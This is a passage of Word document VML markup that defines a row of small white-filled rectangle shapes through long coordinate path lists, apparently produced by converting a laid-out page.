,3629,6912,3628,6912,3627,6912,3625,6912,3623,6912,3622,6912,3620,6912,3618,6912,3617,6912,3615,6912,3613,6912,3611,6912,3609,6912,3607,6912,3605,6912,3603,6912,3600,6912,3598,6912,3596,6912,3593,6912,3591,6912,3588,6912,3586,6912,3583,6912,3580,6912,3577,6912,3574,6912,3571,6912,3568,6912,3565,6912,3562,6912,3559,6912,3555,6912,3552,6912,3548,6912,3545,6912,3541,6912,3537,6912,3534,6912,3530,6912,3526,6912,3522,6912,3518,6912,3513,6912,3509,6912,3505,6912,3500,6912,3496,6912,3491,6912,3486,6912,3481,6912,3476,6912,3471,6912,3466,6912,3461,6912,3456,6912,3450,6912,3445,6912,3439,6912,3433,6912,3428,6912,3422,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6912,3416,6911,3416,6911,3416,6911,3416,6911,3416,6911,3416,6910,3416,6910,3416,6910,3416,6910,3416,6909,3416,6909,3416,6908,3416,6908,3416,6908,3416,6907,3416,6907,3416,6906,3416,6905,3416,6905,3416,6904,3416,6904,3416,6903,3416,6902,3416,6901,3416,6900,3416,6900,3416,6899,3416,6898,3416,6897,3416,6896,3416,6895,3416,6894,3416,6892,3416,6891,3416,6890,3416,6889,3416,6887,3416,6886,3416,6884,3416,6883,3416,6881,3416,6880,3416,6878,3416,6876,3416,6875,3416,6873,3416,6871,3416,6869,3416,6867,3416,6865,3416,6863,3416,6861,3416,6858,3416,6856,3416,6854,3416,6851,3416,6849,3416,6846,3416,6843,3416,6841,3416,6838,3416,6835,3416,6832,3416,6829,3416,6826,3416,6823,3416,6820,3416,6816,3416,6813,3416,6809,3416,6806,3416,6802,3416,6798,3416,6795,3416,6791,3416,6787,3416,6783,3416,6779,3416,6774,3416,6770,3416,6766,3416,6761,3416,6756,3416,6752,3416,6747,3416,6742,3416,6737,3416,6732,3416,6727,3416,6722,3416,6716,3416,6711,3416,6705,3416,6700,3416,6694,3416,6688,3416,6682,3416,6676,3416,6670,3416,6664,3416,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:181.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3630,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:3630;top:6630;width:250;height:270" coordorigin="3630,6630" coordsize="250,270" path="m3656,6657l3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3656,6657,3657,6657,3657,6657,3657,6657,3657,6657,3657,6657,3657,6657,3658,6657,3658,6657,3658,6657,3658,6657,3659,6657,3659,6657,3659,6657,3660,6657,3660,6657,3661,6657,3661,6657,3661,6657,3662,6657,3662,6657,3663,6657,3664,6657,3664,6657,3665,6657,3666,6657,3666,6657,3667,6657,3668,6657,3669,6657,3670,6657,3671,6657,3672,6657,3673,6657,3674,6657,3675,6657,3676,6657,3677,6657,3678,6657,3680,6657,3681,6657,3682,6657,3684,6657,3685,6657,3687,6657,3688,6657,3690,6657,3691,6657,3693,6657,3695,6657,3697,6657,3699,6657,3701,6657,3703,6657,3705,6657,3707,6657,3709,6657,3711,6657,3714,6657,3716,6657,3718,6657,3721,6657,3723,6657,3726,6657,3729,6657,3732,6657,3734,6657,3737,6657,3740,6657,3743,6657,3746,6657,3750,6657,3753,6657,3756,6657,3760,6657,3763,6657,3767,6657,3770,6657,3774,6657,3778,6657,3782,6657,3786,6657,3790,6657,3794,6657,3798,6657,3803,6657,3807,6657,3812,6657,3816,6657,3821,6657,3826,6657,3830,6657,3835,6657,3840,6657,3845,6657,3851,6657,3856,6657,3861,6657,3867,6657,3873,6657,3878,6657,3884,6657,3890,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6658,3896,6658,3896,6658,3896,6658,3896,6658,3896,6658,3896,6658,3896,6658,3896,6658,3896,6658,3896,6659,3896,6659,3896,6659,3896,6659,3896,6659,3896,6660,3896,6660,3896,6660,3896,6661,3896,6661,3896,6661,3896,6662,3896,6662,3896,6663,3896,6663,3896,6664,3896,6664,3896,6665,3896,6666,3896,6666,3896,6667,3896,6668,3896,6669,3896,6669,3896,6670,3896,6671,3896,6672,3896,6673,3896,6674,3896,6675,3896,6676,3896,6677,3896,6679,3896,6680,3896,6681,3896,6683,3896,6684,3896,6685,3896,6687,3896,6688,3896,6690,3896,6692,3896,6693,3896,6695,3896,6697,3896,6699,3896,6701,3896,6703,3896,6705,3896,6707,3896,6709,3896,6712,3896,6714,3896,6716,3896,6719,3896,6721,3896,6724,3896,6726,3896,6729,3896,6732,3896,6735,3896,6738,3896,6741,3896,6744,3896,6747,3896,6750,3896,6754,3896,6757,3896,6761,3896,6764,3896,6768,3896,6771,3896,6775,3896,6779,3896,6783,3896,6787,3896,6791,3896,6796,3896,6800,3896,6804,3896,6809,3896,6813,3896,6818,3896,6823,3896,6828,3896,6833,3896,6838,3896,6843,3896,6848,3896,6853,3896,6859,3896,6864,3896,6870,3896,6876,3896,6882,3896,6888,3896,6894,3896,6900,3896,6906,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3895,6912,3895,6912,3895,6912,3895,6912,3895,6912,3895,6912,3895,6912,3894,6912,3894,6912,3894,6912,3894,6912,3893,6912,3893,6912,3893,6912,3892,6912,3892,6912,3892,6912,3891,6912,3891,6912,3890,6912,3890,6912,3889,6912,3889,6912,3888,6912,3888,6912,3887,6912,3886,6912,3885,6912,3885,6912,3884,6912,3883,6912,3882,6912,3881,6912,3880,6912,3879,6912,3878,6912,3877,6912,3876,6912,3875,6912,3874,6912,3872,6912,3871,6912,3870,6912,3868,6912,3867,6912,3865,6912,3864,6912,3862,6912,3860,6912,3859,6912,3857,6912,3855,6912,3853,6912,3851,6912,3849,6912,3847,6912,3845,6912,3843,6912,3841,6912,3838,6912,3836,6912,3833,6912,3831,6912,3828,6912,3826,6912,3823,6912,3820,6912,3817,6912,3814,6912,3812,6912,3808,6912,3805,6912,3802,6912,3799,6912,3796,6912,3792,6912,3789,6912,3785,6912,3781,6912,3778,6912,3774,6912,3770,6912,3766,6912,3762,6912,3758,6912,3753,6912,3749,6912,3745,6912,3740,6912,3736,6912,3731,6912,3726,6912,3721,6912,3716,6912,3711,6912,3706,6912,3701,6912,3696,6912,3690,6912,3685,6912,3679,6912,3674,6912,3668,6912,3662,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6912,3656,6911,3656,6911,3656,6911,3656,6911,3656,6911,3656,6910,3656,6910,3656,6910,3656,6910,3656,6909,3656,6909,3656,6908,3656,6908,3656,6908,3656,6907,3656,6907,3656,6906,3656,6905,3656,6905,3656,6904,3656,6904,3656,6903,3656,6902,3656,6901,3656,6900,3656,6900,3656,6899,3656,6898,3656,6897,3656,6896,3656,6895,3656,6894,3656,6892,3656,6891,3656,6890,3656,6889,3656,6887,3656,6886,3656,6884,3656,6883,3656,6881,3656,6880,3656,6878,3656,6876,3656,6875,3656,6873,3656,6871,3656,6869,3656,6867,3656,6865,3656,6863,3656,6861,3656,6858,3656,6856,3656,6854,3656,6851,3656,6849,3656,6846,3656,6843,3656,6841,3656,6838,3656,6835,3656,6832,3656,6829,3656,6826,3656,6823,3656,6820,3656,6816,3656,6813,3656,6809,3656,6806,3656,6802,3656,6798,3656,6795,3656,6791,3656,6787,3656,6783,3656,6779,3656,6774,3656,6770,3656,6766,3656,6761,3656,6756,3656,6752,3656,6747,3656,6742,3656,6737,3656,6732,3656,6727,3656,6722,3656,6716,3656,6711,3656,6705,3656,6700,3656,6694,3656,6688,3656,6682,3656,6676,3656,6670,3656,6664,3656,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:193.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3870,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:3870;top:6630;width:250;height:270" coordorigin="3870,6630" coordsize="250,270" path="m3896,6657l3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3896,6657,3897,6657,3897,6657,3897,6657,3897,6657,3897,6657,3897,6657,3897,6657,3898,6657,3898,6657,3898,6657,3898,6657,3899,6657,3899,6657,3899,6657,3900,6657,3900,6657,3901,6657,3901,6657,3902,6657,3902,6657,3903,6657,3903,6657,3904,6657,3904,6657,3905,6657,3906,6657,3907,6657,3907,6657,3908,6657,3909,6657,3910,6657,3911,6657,3912,6657,3913,6657,3914,6657,3915,6657,3916,6657,3917,6657,3918,6657,3920,6657,3921,6657,3922,6657,3924,6657,3925,6657,3927,6657,3928,6657,3930,6657,3932,6657,3933,6657,3935,6657,3937,6657,3939,6657,3941,6657,3943,6657,3945,6657,3947,6657,3949,6657,3951,6657,3954,6657,3956,6657,3959,6657,3961,6657,3964,6657,3966,6657,3969,6657,3972,6657,3975,6657,3977,6657,3980,6657,3983,6657,3987,6657,3990,6657,3993,6657,3996,6657,4000,6657,4003,6657,4007,6657,4011,6657,4014,6657,4018,6657,4022,6657,4026,6657,4030,6657,4034,6657,4038,6657,4043,6657,4047,6657,4052,6657,4056,6657,4061,6657,4066,6657,4071,6657,4075,6657,4080,6657,4086,6657,4091,6657,4096,6657,4102,6657,4107,6657,4113,6657,4118,6657,4124,6657,4130,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6658,4136,6658,4136,6658,4136,6658,4136,6658,4136,6658,4136,6658,4136,6658,4136,6658,4136,6658,4136,6659,4136,6659,4136,6659,4136,6659,4136,6659,4136,6660,4136,6660,4136,6660,4136,6661,4136,6661,4136,6661,4136,6662,4136,6662,4136,6663,4136,6663,4136,6664,4136,6664,4136,6665,4136,6666,4136,6666,4136,6667,4136,6668,4136,6669,4136,6669,4136,6670,4136,6671,4136,6672,4136,6673,4136,6674,4136,6675,4136,6676,4136,6677,4136,6679,4136,6680,4136,6681,4136,6683,4136,6684,4136,6685,4136,6687,4136,6688,4136,6690,4136,6692,4136,6693,4136,6695,4136,6697,4136,6699,4136,6701,4136,6703,4136,6705,4136,6707,4136,6709,4136,6712,4136,6714,4136,6716,4136,6719,4136,6721,4136,6724,4136,6726,4136,6729,4136,6732,4136,6735,4136,6738,4136,6741,4136,6744,4136,6747,4136,6750,4136,6754,4136,6757,4136,6761,4136,6764,4136,6768,4136,6771,4136,6775,4136,6779,4136,6783,4136,6787,4136,6791,4136,6796,4136,6800,4136,6804,4136,6809,4136,6813,4136,6818,4136,6823,4136,6828,4136,6833,4136,6838,4136,6843,4136,6848,4136,6853,4136,6859,4136,6864,4136,6870,4136,6876,4136,6882,4136,6888,4136,6894,4136,6900,4136,6906,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4135,6912,4135,6912,4135,6912,4135,6912,4135,6912,4135,6912,4135,6912,4134,6912,4134,6912,4134,6912,4134,6912,4133,6912,4133,6912,4133,6912,4132,6912,4132,6912,4131,6912,4131,6912,4130,6912,4130,6912,4129,6912,4129,6912,4128,6912,4128,6912,4127,6912,4126,6912,4126,6912,4125,6912,4124,6912,4123,6912,4122,6912,4121,6912,4120,6912,4119,6912,4118,6912,4117,6912,4116,6912,4115,6912,4114,6912,4112,6912,4111,6912,4110,6912,4108,6912,4107,6912,4105,6912,4104,6912,4102,6912,4100,6912,4099,6912,4097,6912,4095,6912,4093,6912,4091,6912,4089,6912,4087,6912,4085,6912,4083,6912,4081,6912,4078,6912,4076,6912,4074,6912,4071,6912,4068,6912,4066,6912,4063,6912,4060,6912,4058,6912,4055,6912,4052,6912,4049,6912,4045,6912,4042,6912,4039,6912,4036,6912,4032,6912,4029,6912,4025,6912,4021,6912,4018,6912,4014,6912,4010,6912,4006,6912,4002,6912,3998,6912,3994,6912,3989,6912,3985,6912,3980,6912,3976,6912,3971,6912,3966,6912,3962,6912,3957,6912,3952,6912,3946,6912,3941,6912,3936,6912,3930,6912,3925,6912,3919,6912,3914,6912,3908,6912,3902,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6912,3896,6911,3896,6911,3896,6911,3896,6911,3896,6911,3896,6910,3896,6910,3896,6910,3896,6910,3896,6909,3896,6909,3896,6908,3896,6908,3896,6908,3896,6907,3896,6907,3896,6906,3896,6905,3896,6905,3896,6904,3896,6904,3896,6903,3896,6902,3896,6901,3896,6900,3896,6900,3896,6899,3896,6898,3896,6897,3896,6896,3896,6895,3896,6894,3896,6892,3896,6891,3896,6890,3896,6889,3896,6887,3896,6886,3896,6884,3896,6883,3896,6881,3896,6880,3896,6878,3896,6876,3896,6875,3896,6873,3896,6871,3896,6869,3896,6867,3896,6865,3896,6863,3896,6861,3896,6858,3896,6856,3896,6854,3896,6851,3896,6849,3896,6846,3896,6843,3896,6841,3896,6838,3896,6835,3896,6832,3896,6829,3896,6826,3896,6823,3896,6820,3896,6816,3896,6813,3896,6809,3896,6806,3896,6802,3896,6798,3896,6795,3896,6791,3896,6787,3896,6783,3896,6779,3896,6774,3896,6770,3896,6766,3896,6761,3896,6756,3896,6752,3896,6747,3896,6742,3896,6737,3896,6732,3896,6727,3896,6722,3896,6716,3896,6711,3896,6705,3896,6700,3896,6694,3896,6688,3896,6682,3896,6676,3896,6670,3896,6664,3896,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:205.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4110,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:4110;top:6630;width:250;height:270" coordorigin="4110,6630" coordsize="250,270" path="m4136,6657l4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4136,6657,4137,6657,4137,6657,4137,6657,4137,6657,4137,6657,4137,6657,4137,6657,4138,6657,4138,6657,4138,6657,4138,6657,4139,6657,4139,6657,4139,6657,4140,6657,4140,6657,4140,6657,4141,6657,4141,6657,4142,6657,4142,6657,4143,6657,4143,6657,4144,6657,4145,6657,4145,6657,4146,6657,4147,6657,4147,6657,4148,6657,4149,6657,4150,6657,4151,6657,4152,6657,4153,6657,4154,6657,4155,6657,4156,6657,4157,6657,4159,6657,4160,6657,4161,6657,4162,6657,4164,6657,4165,6657,4167,6657,4168,6657,4170,6657,4172,6657,4173,6657,4175,6657,4177,6657,4179,6657,4181,6657,4183,6657,4185,6657,4187,6657,4189,6657,4192,6657,4194,6657,4196,6657,4199,6657,4201,6657,4204,6657,4206,6657,4209,6657,4212,6657,4215,6657,4218,6657,4221,6657,4224,6657,4227,6657,4230,6657,4233,6657,4237,6657,4240,6657,4243,6657,4247,6657,4251,6657,4254,6657,4258,6657,4262,6657,4266,6657,4270,6657,4274,6657,4279,6657,4283,6657,4287,6657,4292,6657,4296,6657,4301,6657,4306,6657,4311,6657,4316,6657,4321,6657,4326,6657,4331,6657,4336,6657,4342,6657,4347,6657,4353,6657,4358,6657,4364,6657,4370,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6658,4376,6658,4376,6658,4376,6658,4376,6658,4376,6658,4376,6658,4376,6658,4376,6658,4376,6658,4376,6659,4376,6659,4376,6659,4376,6659,4376,6659,4376,6660,4376,6660,4376,6660,4376,6661,4376,6661,4376,6661,4376,6662,4376,6662,4376,6663,4376,6663,4376,6664,4376,6664,4376,6665,4376,6666,4376,6666,4376,6667,4376,6668,4376,6669,4376,6669,4376,6670,4376,6671,4376,6672,4376,6673,4376,6674,4376,6675,4376,6676,4376,6677,4376,6679,4376,6680,4376,6681,4376,6683,4376,6684,4376,6685,4376,6687,4376,6688,4376,6690,4376,6692,4376,6693,4376,6695,4376,6697,4376,6699,4376,6701,4376,6703,4376,6705,4376,6707,4376,6709,4376,6712,4376,6714,4376,6716,4376,6719,4376,6721,4376,6724,4376,6726,4376,6729,4376,6732,4376,6735,4376,6738,4376,6741,4376,6744,4376,6747,4376,6750,4376,6754,4376,6757,4376,6761,4376,6764,4376,6768,4376,6771,4376,6775,4376,6779,4376,6783,4376,6787,4376,6791,4376,6796,4376,6800,4376,6804,4376,6809,4376,6813,4376,6818,4376,6823,4376,6828,4376,6833,4376,6838,4376,6843,4376,6848,4376,6853,4376,6859,4376,6864,4376,6870,4376,6876,4376,6882,4376,6888,4376,6894,4376,6900,4376,6906,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4375,6912,4375,6912,4375,6912,4375,6912,4375,6912,4374,6912,4374,6912,4374,6912,4374,6912,4373,6912,4373,6912,4373,6912,4372,6912,4372,6912,4372,6912,4371,6912,4371,6912,4370,6912,4370,6912,4369,6912,4368,6912,4368,6912,4367,6912,4366,6912,4366,6912,4365,6912,4364,6912,4363,6912,4362,6912,4361,6912,4360,6912,4359,6912,4358,6912,4357,6912,4356,6912,4355,6912,4354,6912,4352,6912,4351,6912,4350,6912,4348,6912,4347,6912,4345,6912,4344,6912,4342,6912,4341,6912,4339,6912,4337,6912,4335,6912,4333,6912,4331,6912,4329,6912,4327,6912,4325,6912,4323,6912,4321,6912,4318,6912,4316,6912,4314,6912,4311,6912,4309,6912,4306,6912,4303,6912,4300,6912,4298,6912,4295,6912,4292,6912,4289,6912,4286,6912,4282,6912,4279,6912,4276,6912,4272,6912,4269,6912,4265,6912,4262,6912,4258,6912,4254,6912,4250,6912,4246,6912,4242,6912,4238,6912,4234,6912,4229,6912,4225,6912,4220,6912,4216,6912,4211,6912,4206,6912,4202,6912,4197,6912,4192,6912,4187,6912,4181,6912,4176,6912,4171,6912,4165,6912,4159,6912,4154,6912,4148,6912,4142,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6912,4136,6911,4136,6911,4136,6911,4136,6911,4136,6911,4136,6910,4136,6910,4136,6910,4136,6910,4136,6909,4136,6909,4136,6908,4136,6908,4136,6908,4136,6907,4136,6907,4136,6906,4136,6905,4136,6905,4136,6904,4136,6904,4136,6903,4136,6902,4136,6901,4136,6900,4136,6900,4136,6899,4136,6898,4136,6897,4136,6896,4136,6895,4136,6894,4136,6892,4136,6891,4136,6890,4136,6889,4136,6887,4136,6886,4136,6884,4136,6883,4136,6881,4136,6880,4136,6878,4136,6876,4136,6875,4136,6873,4136,6871,4136,6869,4136,6867,4136,6865,4136,6863,4136,6861,4136,6858,4136,6856,4136,6854,4136,6851,4136,6849,4136,6846,4136,6843,4136,6841,4136,6838,4136,6835,4136,6832,4136,6829,4136,6826,4136,6823,4136,6820,4136,6816,4136,6813,4136,6809,4136,6806,4136,6802,4136,6798,4136,6795,4136,6791,4136,6787,4136,6783,4136,6779,4136,6774,4136,6770,4136,6766,4136,6761,4136,6756,4136,6752,4136,6747,4136,6742,4136,6737,4136,6732,4136,6727,4136,6722,4136,6716,4136,6711,4136,6705,4136,6700,4136,6694,4136,6688,4136,6682,4136,6676,4136,6670,4136,6664,4136,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:217.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4350,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:4350;top:6630;width:250;height:270" coordorigin="4350,6630" coordsize="250,270" path="m4376,6657l4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4376,6657,4377,6657,4377,6657,4377,6657,4377,6657,4377,6657,4377,6657,4377,6657,4377,6657,4378,6657,4378,6657,4378,6657,4378,6657,4378,6657,4379,6657,4379,6657,4379,6657,4380,6657,4380,6657,4380,6657,4381,6657,4381,6657,4382,6657,4382,6657,4383,6657,4383,6657,4384,6657,4385,6657,4385,6657,4386,6657,4387,6657,4388,6657,4388,6657,4389,6657,4390,6657,4391,6657,4392,6657,4393,6657,4394,6657,4395,6657,4396,6657,4397,6657,4399,6657,4400,6657,4401,6657,4403,6657,4404,6657,4405,6657,4407,6657,4409,6657,4410,6657,4412,6657,4414,6657,4415,6657,4417,6657,4419,6657,4421,6657,4423,6657,4425,6657,4427,6657,4429,6657,4432,6657,4434,6657,4436,6657,4439,6657,4441,6657,4444,6657,4446,6657,4449,6657,4452,6657,4455,6657,4458,6657,4461,6657,4464,6657,4467,6657,4470,6657,4473,6657,4477,6657,4480,6657,4484,6657,4487,6657,4491,6657,4495,6657,4498,6657,4502,6657,4506,6657,4510,6657,4514,6657,4519,6657,4523,6657,4527,6657,4532,6657,4536,6657,4541,6657,4546,6657,4551,6657,4556,6657,4561,6657,4566,6657,4571,6657,4576,6657,4582,6657,4587,6657,4593,6657,4599,6657,4604,6657,4610,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6658,4616,6658,4616,6658,4616,6658,4616,6658,4616,6658,4616,6658,4616,6658,4616,6658,4616,6658,4616,6659,4616,6659,4616,6659,4616,6659,4616,6659,4616,6660,4616,6660,4616,6660,4616,6661,4616,6661,4616,6661,4616,6662,4616,6662,4616,6663,4616,6663,4616,6664,4616,6664,4616,6665,4616,6666,4616,6666,4616,6667,4616,6668,4616,6669,4616,6669,4616,6670,4616,6671,4616,6672,4616,6673,4616,6674,4616,6675,4616,6676,4616,6677,4616,6679,4616,6680,4616,6681,4616,6683,4616,6684,4616,6685,4616,6687,4616,6688,4616,6690,4616,6692,4616,6693,4616,6695,4616,6697,4616,6699,4616,6701,4616,6703,4616,6705,4616,6707,4616,6709,4616,6712,4616,6714,4616,6716,4616,6719,4616,6721,4616,6724,4616,6726,4616,6729,4616,6732,4616,6735,4616,6738,4616,6741,4616,6744,4616,6747,4616,6750,4616,6754,4616,6757,4616,6761,4616,6764,4616,6768,4616,6771,4616,6775,4616,6779,4616,6783,4616,6787,4616,6791,4616,6796,4616,6800,4616,6804,4616,6809,4616,6813,4616,6818,4616,6823,4616,6828,4616,6833,4616,6838,4616,6843,4616,6848,4616,6853,4616,6859,4616,6864,4616,6870,4616,6876,4616,6882,4616,6888,4616,6894,4616,6900,4616,6906,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4615,6912,4615,6912,4615,6912,4615,6912,4615,6912,4615,6912,4614,6912,4614,6912,4614,6912,4614,6912,4613,6912,4613,6912,4612,6912,4612,6912,4612,6912,4611,6912,4611,6912,4610,6912,4610,6912,4609,6912,4609,6912,4608,6912,4607,6912,4607,6912,4606,6912,4605,6912,4604,6912,4603,6912,4602,6912,4602,6912,4601,6912,4600,6912,4599,6912,4597,6912,4596,6912,4595,6912,4594,6912,4593,6912,4591,6912,4590,6912,4589,6912,4587,6912,4586,6912,4584,6912,4582,6912,4581,6912,4579,6912,4577,6912,4575,6912,4573,6912,4572,6912,4570,6912,4567,6912,4565,6912,4563,6912,4561,6912,4559,6912,4556,6912,4554,6912,4551,6912,4549,6912,4546,6912,4543,6912,4541,6912,4538,6912,4535,6912,4532,6912,4529,6912,4526,6912,4522,6912,4519,6912,4516,6912,4512,6912,4509,6912,4505,6912,4502,6912,4498,6912,4494,6912,4490,6912,4486,6912,4482,6912,4478,6912,4474,6912,4470,6912,4465,6912,4461,6912,4456,6912,4451,6912,4447,6912,4442,6912,4437,6912,4432,6912,4427,6912,4421,6912,4416,6912,4411,6912,4405,6912,4400,6912,4394,6912,4388,6912,4382,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6912,4376,6911,4376,6911,4376,6911,4376,6911,4376,6911,4376,6910,4376,6910,4376,6910,4376,6910,4376,6909,4376,6909,4376,6908,4376,6908,4376,6908,4376,6907,4376,6907,4376,6906,4376,6905,4376,6905,4376,6904,4376,6904,4376,6903,4376,6902,4376,6901,4376,6900,4376,6900,4376,6899,4376,6898,4376,6897,4376,6896,4376,6895,4376,6894,4376,6892,4376,6891,4376,6890,4376,6889,4376,6887,4376,6886,4376,6884,4376,6883,4376,6881,4376,6880,4376,6878,4376,6876,4376,6875,4376,6873,4376,6871,4376,6869,4376,6867,4376,6865,4376,6863,4376,6861,4376,6858,4376,6856,4376,6854,4376,6851,4376,6849,4376,6846,4376,6843,4376,6841,4376,6838,4376,6835,4376,6832,4376,6829,4376,6826,4376,6823,4376,6820,4376,6816,4376,6813,4376,6809,4376,6806,4376,6802,4376,6798,4376,6795,4376,6791,4376,6787,4376,6783,4376,6779,4376,6774,4376,6770,4376,6766,4376,6761,4376,6756,4376,6752,4376,6747,4376,6742,4376,6737,4376,6732,4376,6727,4376,6722,4376,6716,4376,6711,4376,6705,4376,6700,4376,6694,4376,6688,4376,6682,4376,6676,4376,6670,4376,6664,4376,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:229.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4590,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:4590;top:6630;width:250;height:270" coordorigin="4590,6630" coordsize="250,270" path="m4616,6657l4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4616,6657,4617,6657,4617,6657,4617,6657,4617,6657,4617,6657,4617,6657,4617,6657,4617,6657,4617,6657,4617,6657,4618,6657,4618,6657,4618,6657,4618,6657,4619,6657,4619,6657,4619,6657,4619,6657,4620,6657,4620,6657,4621,6657,4621,6657,4621,6657,4622,6657,4622,6657,4623,6657,4624,6657,4624,6657,4625,6657,4625,6657,4626,6657,4627,6657,4628,6657,4628,6657,4629,6657,4630,6657,4631,6657,4632,6657,4633,6657,4634,6657,4635,6657,4636,6657,4638,6657,4639,6657,4640,6657,4641,6657,4643,6657,4644,6657,4646,6657,4647,6657,4649,6657,4650,6657,4652,6657,4654,6657,4655,6657,4657,6657,4659,6657,4661,6657,4663,6657,4665,6657,4667,6657,4670,6657,4672,6657,4674,6657,4676,6657,4679,6657,4681,6657,4684,6657,4687,6657,4689,6657,4692,6657,4695,6657,4698,6657,4701,6657,4704,6657,4707,6657,4710,6657,4713,6657,4717,6657,4720,6657,4724,6657,4727,6657,4731,6657,4735,6657,4738,6657,4742,6657,4746,6657,4750,6657,4755,6657,4759,6657,4763,6657,4768,6657,4772,6657,4777,6657,4781,6657,4786,6657,4791,6657,4796,6657,4801,6657,4806,6657,4811,6657,4817,6657,4822,6657,4827,6657,4833,6657,4839,6657,4845,6657,4850,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6658,4856,6658,4856,6658,4856,6658,4856,6658,4856,6658,4856,6658,4856,6658,4856,6658,4856,6658,4856,6659,4856,6659,4856,6659,4856,6659,4856,6659,4856,6660,4856,6660,4856,6660,4856,6661,4856,6661,4856,6661,4856,6662,4856,6662,4856,6663,4856,6663,4856,6664,4856,6664,4856,6665,4856,6666,4856,6666,4856,6667,4856,6668,4856,6669,4856,6669,4856,6670,4856,6671,4856,6672,4856,6673,4856,6674,4856,6675,4856,6676,4856,6677,4856,6679,4856,6680,4856,6681,4856,6683,4856,6684,4856,6685,4856,6687,4856,6688,4856,6690,4856,6692,4856,6693,4856,6695,4856,6697,4856,6699,4856,6701,4856,6703,4856,6705,4856,6707,4856,6709,4856,6712,4856,6714,4856,6716,4856,6719,4856,6721,4856,6724,4856,6726,4856,